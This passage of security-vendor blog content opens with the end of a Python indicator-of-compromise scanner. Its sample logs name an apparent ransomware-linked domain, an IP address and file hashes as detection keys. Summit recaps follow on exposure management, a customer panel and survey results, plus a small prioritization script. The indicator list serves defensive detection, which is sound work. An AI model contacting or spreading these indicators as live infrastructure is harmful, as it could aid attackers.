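    'sha256=8CEE3EC87A5728BE17F838F526D7EF3A842CE8956FE101ED247A5EB1494C579D',
    'ts=2025-05-20T10:01:05Z host=WS01 event=network_connect dst=82.147.84.98 dport=443',
    'ts=2025-05-20T10:01:07Z host=WS01 event=dns_query qname=www.funksec.top',
    'ts=2025-05-20T10:01:09Z host=WS02 event=process_create '
    'image="C:\\Windows\\System32\\svchost.exe" '
    'sha256=0000000000000000000000000000000000000000000000000000000000000000',
    'ts=2025-05-20T10:01:11Z host=WS02 event=network_connect dst=10.0.0.5 dport=445',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOGS):
        print(f"line {hit['line']}: {hit['kind']} {hit['value']} -> {hit['group']}")
```

Two details matter in practice: hashes are compared case-insensitively because different sensors emit different cases, and DNS names are matched against every parent domain so a query for a subdomain of a listed domain still hits. The Session and TOX IDs on the page are contact handles rather than network observables, so they are deliberately not used as match keys.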


Key Takeaways from the Take Command Summit 2025: Risk Revolution – Proactive Strategies for Exposure Management

2 June 2025 at 09:00

At the Take Command 2025 Virtual Cybersecurity Summit, a standout session titled Risk Revolution brought together Rapid7 product leaders and ESG analyst Tyler Shields to unpack the evolution of exposure management — and how organizations can build more context-driven, proactive risk strategies.

Hosted by Ryan Blanchard, Senior Manager, Product Marketing at Rapid7, the panel featured:

  • Jane Man, Senior Director of Product Management, Rapid7
  • Jamie Douglas, Specialist, Rapid7
  • Tyler Shields, Principal Analyst, Risk and Vulnerability Management, ESG

Here are the key takeaways from the discussion, along with supporting insights from the post-event attendee survey.

From vulnerability management to exposure management

The session opened by distinguishing exposure management from traditional vulnerability management. Tyler Shields explained:

“Exposure management is the maturation of vulnerability management… It's understanding risk, business context, and prioritizing accordingly.”

Rather than focusing solely on patching, exposure management is about knowing what to fix, why it matters, and who owns it, and doing so continuously.

Visibility gaps are slowing teams down

Visibility was a central theme throughout the session. Jane Man noted:

“A lot of the customers we talk to still struggle with just identifying what they have.”

This challenge was echoed in the post-event survey, where 53% of respondents cited identifying unknown assets as the top challenge in their exposure management programs.

Tyler added:

“You can’t protect what you don’t know about. And you certainly can’t prioritize it.”

Prioritization must be contextual

Prioritization remains a major hurdle for many organizations. Jamie Douglas stressed that severity alone isn’t enough:

“You can have a critical vulnerability on a printer, but if it’s segmented and not internet-facing, is it really a priority?”

The team emphasized the importance of integrating business impact, asset criticality, exploitability, and ownership into the prioritization process.

“If you don’t tie risk to business context, you’re just chasing numbers,” Tyler noted.

It’s time to break down silos

A powerful moment in the session came when the panel discussed collaboration across functions. Jane shared:

“Security doesn’t operate in a vacuum. You need buy-in from engineering, cloud, compliance - everyone has a role in risk reduction.”

Without shared language and unified dashboards, visibility doesn’t translate into action. The speakers urged teams to build bridges with IT and DevOps to ensure findings are actually resolved, not just reported.

Survey: risk prioritization is lagging behind

In the survey, only 18% of respondents said their organizations integrate threat intelligence into exposure management “very effectively”, highlighting a clear opportunity to improve how teams prioritize risk with real-time context.

This stat reinforces the panel’s broader message: that exposure management isn’t a point-in-time project — it’s a continuous, evolving practice.

Watch the full session on demand

For a deeper dive into the frameworks, real-world examples, and exposure strategies discussed in this session, watch Risk Revolution on demand.

Watch the Full Session

Key Takeaways from the Take Command Summit 2025: Customer Panel on Future-Proofing VM Programs

28 May 2025 at 09:00

One of the most actionable sessions at the Take Command 2025 Virtual Cybersecurity Summit came directly from the field. In a panel hosted by Aniket Menon, VP of Product Management at Rapid7, security leaders from Cross Financial Corp, Phibro Animal Health Corporation, and Miltenyi Biotec shared how they’re evolving vulnerability management into a proactive exposure management strategy.

With real-world examples, team metrics, and shared challenges, the panel offered practical advice for teams ready to modernize their approach and reduce risk with more focus and confidence.

From VM to EM: A shift in mindset

Panelists agreed: traditional vulnerability management practices can’t keep up with today’s dynamic, hybrid environments. To stay ahead, security teams must shift toward continuous exposure assessment - building context around vulnerabilities and aligning efforts with business priorities.

As one attendee later shared in our post-event survey:

“Moving from vulnerability management to exposure management isn’t just a process change - it’s a mindset shift. It forces us to be more proactive.”

This takeaway aligns with broader findings from the summit survey, where 64% of respondents identified exposure management as a top priority for improving their detection and response strategies.

Prioritization requires business context

Volume isn’t the issue - context is. The panel emphasized that real risk reduction happens when teams align remediation priorities with asset value, exploitability, and operational relevance. That means:

  • Building dashboards tailored for different stakeholders
  • Connecting security and IT teams through shared language
  • Using context to elevate urgency and drive action
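Both the Risk Revolution session (the "critical vulnerability on a segmented printer" point) and this panel describe the same technique: ranking findings by business context rather than CVSS alone. As an added example, not code from Rapid7, ESG or any panelist, the following Python ranks constructed findings by severity, reachability, asset criticality and exploitation status, and lists the ones nobody owns. The weights, field names and sample findings are illustrative assumptions, not any vendor's scoring model.

```python
# Added example: contextual prioritization of vulnerability findings.
# Weights and sample data are assumptions for illustration only.
from dataclasses import dataclass
from typing import Optional


@dataclass
class Finding:
    asset: str
    vuln_id: str
    cvss: float                  # base severity 0-10 as reported by the scanner
    internet_facing: bool        # reachable from the internet
    segmented: bool              # reachable only from a restricted network zone
    asset_criticality: int       # 1 (low) .. 5 (business-critical), set by the owner
    known_exploited: bool        # confirmed exploited in the wild per threat intel
    owner: Optional[str] = None  # remediation owner; None means nobody will fix it


def exposure_factor(f: Finding) -> float:
    """Assumed reachability weights: internet-facing 1.0, flat internal 0.6, segmented 0.25."""
    if f.internet_facing:
        return 1.0
    if f.segmented:
        return 0.25
    return 0.6


def risk_score(f: Finding) -> float:
    """Contextual score = severity x reachability x business value, boosted if exploited."""
    score = f.cvss * exposure_factor(f) * (f.asset_criticality / 5)
    if f.known_exploited:
        score *= 1.5  # assumed boost for confirmed exploitation
    return round(min(score, 10.0), 2)


def prioritize(findings):
    """Return (score, finding) pairs, highest contextual risk first."""
    return sorted(((risk_score(f), f) for f in findings),
                  key=lambda pair: pair[0], reverse=True)


def unowned(findings):
    """Findings that will stall because no remediation owner is assigned."""
    return [f for f in findings if f.owner is None]


# Constructed sample findings (not real scan data).
SAMPLE = [
    Finding("print-03", "EXAMPLE-1", 9.8, internet_facing=False, segmented=True,
            asset_criticality=1, known_exploited=False, owner="facilities"),
    Finding("web-01", "EXAMPLE-2", 6.5, internet_facing=True, segmented=False,
            asset_criticality=5, known_exploited=True, owner=None),
    Finding("db-02", "EXAMPLE-3", 8.1, internet_facing=False, segmented=False,
            asset_criticality=4, known_exploited=False, owner="dba-team"),
]

if __name__ == "__main__":
    for score, f in prioritize(SAMPLE):
        print(f"{score:5.2f}  {f.asset:9}  {f.vuln_id}  cvss={f.cvss}  owner={f.owner}")
    print("unowned:", [f.asset for f in unowned(SAMPLE)])
```

With these weights the 9.8 on the segmented printer scores 0.49 and drops to the bottom, while the 6.5 on the internet-facing, business-critical, actively exploited web server scores 9.75 and rises to the top, which is exactly the reordering the panelists argued for. The `unowned` check is the "who owns it" half of the problem: a top-ranked finding with no owner is a dashboard entry, not a fix.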

You can’t fix what you can’t see

Despite tool investments, many organizations still struggle with asset discovery and visibility. In fact, 53% of survey respondents said identifying unknown assets is the most challenging part of exposure management.

As Edward Chang, Senior Manager of Cybersecurity and Compliance at Phibro Animal Health Corporation, explained during the panel:

“No one has 100% visibility. But if we can improve what we see and give that context to the right teams, we’re already ahead of where we were last year.”

The session encouraged using telemetry, automation, and unified data views to close gaps across environments.

Bridging the gap between security and operations

A recurring theme across the panel was the need for collaboration between security, infrastructure, and engineering teams. Effective exposure management doesn’t just rely on the right data — it depends on the right relationships.

Security teams must be integrated into how organizations build, deploy, and operate — not treated as a separate or downstream function. Building that alignment means treating security as an enabler, not a roadblock.

Ownership, accountability, and human risk

Beyond technology, the session also addressed ownership and accountability. Security leaders must not only flag risk — they must clearly assign and communicate responsibility. As attack surfaces expand and teams diversify, the ability to coordinate across functions becomes even more critical.

Watch the full panel on demand

If you're looking to strengthen your vulnerability management program or build a more proactive exposure management strategy, this session offers a roadmap shaped by real-world experience.

Watch the Customer Panel On Demand

What the Take Command 2025 Survey Tells Us About the State of Security

22 May 2025 at 11:00

The Take Command 2025 Virtual Cybersecurity Summit wasn’t just about sharing insights, it was about listening. After the live sessions wrapped, we surveyed attendees to understand where their security programs stand today, what challenges they’re facing, and what they found most valuable during the event.

Now, we’re excited to share those insights in a new downloadable infographic - The Take Command: Pulse of the Industry Survey, capturing the state of exposure management, AI adoption, MDR maturity, and more.

Here are a few standout takeaways from the survey, and where to dive deeper in the sessions on demand.

Exposure management: confidence is growing — but challenges remain

80% of respondents said they have confidence in their ability to respond to cyber risks through their exposure management program, and 60% reported successful integration of EM into their broader security workflows.

But the day-of survey showed a more nuanced reality. More than half of respondents cited identifying unknown assets and monitoring third-party risk as the top challenges in their exposure programs.

To explore solutions and strategies, check out Risk Revolution: Proactive Strategies for Exposure Management.

MDR adoption is strong — but visibility still needs work

58% of respondents rated their detection and response capabilities at 4 or 5 out of 5, and most teams using MDR cited a need for 24/7 monitoring and support for under-resourced teams. But 21% rated their confidence at 3 or below, indicating that making the right choice in MDR partner is critical.

In sessions like Inside the SOC and Demystifying Cloud Detection & Response, Rapid7’s teams shared real-world threat hunting stories and cloud-centric detection tactics to help close the gap.

Generative AI is a double-edged sword

Generative AI was one of the most discussed topics across the day — and for good reason. 50% of respondents said they were “very” or “extremely concerned” about adversaries using AI to enhance cyber attacks. Yet 36% of respondents say they’re not currently using Generative AI in their own security operations, citing barriers like tool integration, cost, and lack of skilled personnel.

For those navigating this space, AI in Action and Rise of the Machines both delivered practical examples of how teams are using AI responsibly to improve triage, detection, and response — while setting the necessary guardrails for safe adoption.

What attendees found most valuable

Take Command 2025 drew more than 2,200 live attendees, with on-demand views continuing to grow — and the feedback was clear: the content delivered. 67% of survey respondents rated the speakers as “Excellent”, with similarly high marks for session content and delivery.

When asked about their biggest takeaways, attendees consistently highlighted:

  • Exposure management and risk visibility are key
  • SOC operations and real-world case studies
  • AI’s role in transforming security strategy
  • The importance of “thinking like a hacker” to improve defenses

Attendees also appreciated the balance of voices, with one noting:

“Good mix of internal and external resources that knew what they were talking about and how to deliver it to a wide audience.”

Another shared:

“I didn’t think Rapid7 could improve its ability to unify information — but the new Exposure Command solution has done just that.”

From the depth of expertise to the variety of session formats, the summit resonated with attendees across roles, regions, and industries.

Explore the full infographic

Want a deeper dive into the data? Download the full Take Command: Pulse of the Industry Survey infographic to explore:

  • Where teams are seeing success with exposure management
  • How GenAI is being used (or not) across security operations
  • What MDR teams are prioritizing — and what’s holding them back
  • The biggest technical and strategic challenges security leaders face in 2025

Download the infographic

Catch up or rewatch: all sessions on demand

Whether you missed the live event or want to explore specific topics in more detail, every session from Take Command 2025 is now available to watch on demand.
